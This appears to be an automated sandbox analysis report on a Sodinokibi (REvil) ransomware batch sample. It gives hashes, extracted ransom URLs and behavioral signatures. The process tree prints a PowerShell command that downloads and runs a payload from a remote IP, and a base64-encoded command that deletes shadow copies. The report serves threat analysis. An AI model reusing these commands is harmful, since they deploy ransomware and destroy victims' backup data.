Analysis
-
max time kernel
25s -
max time network
35s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
9LqmY8y8.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
9LqmY8y8.bat
Resource
win10v200430
General
-
Target
9LqmY8y8.bat
-
Size
189B
-
MD5
409cb77ca0557e5e095df01063ea8ff3
-
SHA1
e664180fcedc6210419e8382edcb017f9dcd2363
-
SHA256
f4cc72498bffce63ae55294e28cdf826ee706385369edbba23a3953c60097a19
-
SHA512
88cda05b09f04c3ea95eceec40d441f616b9cce3e5b39e569ced01bb030ba8cc40a77f49521d3ca7db7db838f93895cfec52248b4d0a5f58ba36344cd39c85e8
Malware Config
Extracted
http://185.103.242.78/pastes/9LqmY8y8
Extracted
C:\cri431j2le-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/658B6E0D1FEB0F68
http://decryptor.cc/658B6E0D1FEB0F68
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 112 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 288 wrote to memory of 112 288 cmd.exe powershell.exe PID 112 wrote to memory of 1800 112 powershell.exe powershell.exe PID 112 wrote to memory of 1800 112 powershell.exe powershell.exe PID 112 wrote to memory of 1800 112 powershell.exe powershell.exe PID 112 wrote to memory of 1800 112 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 112 powershell.exe 112 powershell.exe 112 powershell.exe 1800 powershell.exe 1800 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 112 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\SkipUnprotect.inf powershell.exe File opened for modification \??\c:\program files\UnprotectFind.tif powershell.exe File created \??\c:\program files\cri431j2le-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableTest.midi powershell.exe File opened for modification \??\c:\program files\NewCompress.m4a powershell.exe File opened for modification \??\c:\program files\ResumeRename.csv powershell.exe File opened for modification \??\c:\program files\RemoveFormat.3gp powershell.exe File opened for modification \??\c:\program files\TestOptimize.jpe powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\cri431j2le-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\cri431j2le-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointBlock.dxf powershell.exe File opened for modification \??\c:\program files\GrantSkip.vdw powershell.exe File created \??\c:\program files\microsoft sql server compact edition\cri431j2le-readme.txt powershell.exe File opened for modification \??\c:\program files\MoveSave.ADTS powershell.exe File created \??\c:\program files (x86)\cri431j2le-readme.txt powershell.exe File opened for modification \??\c:\program files\PublishTrace.mp4v powershell.exe File opened for modification \??\c:\program files\AssertWatch.tif powershell.exe File opened for modification \??\c:\program files\OptimizeInitialize.pptx powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8z0xqy.bmp" powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 1 http://185.103.242.78/pastes/9LqmY8y8 -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeBackupPrivilege 760 vssvc.exe Token: SeRestorePrivilege 760 vssvc.exe Token: SeAuditPrivilege 760 vssvc.exe Token: SeTakeOwnershipPrivilege 112 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\9LqmY8y8.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9LqmY8y8');Invoke-CZHNNB;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
PID:112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:760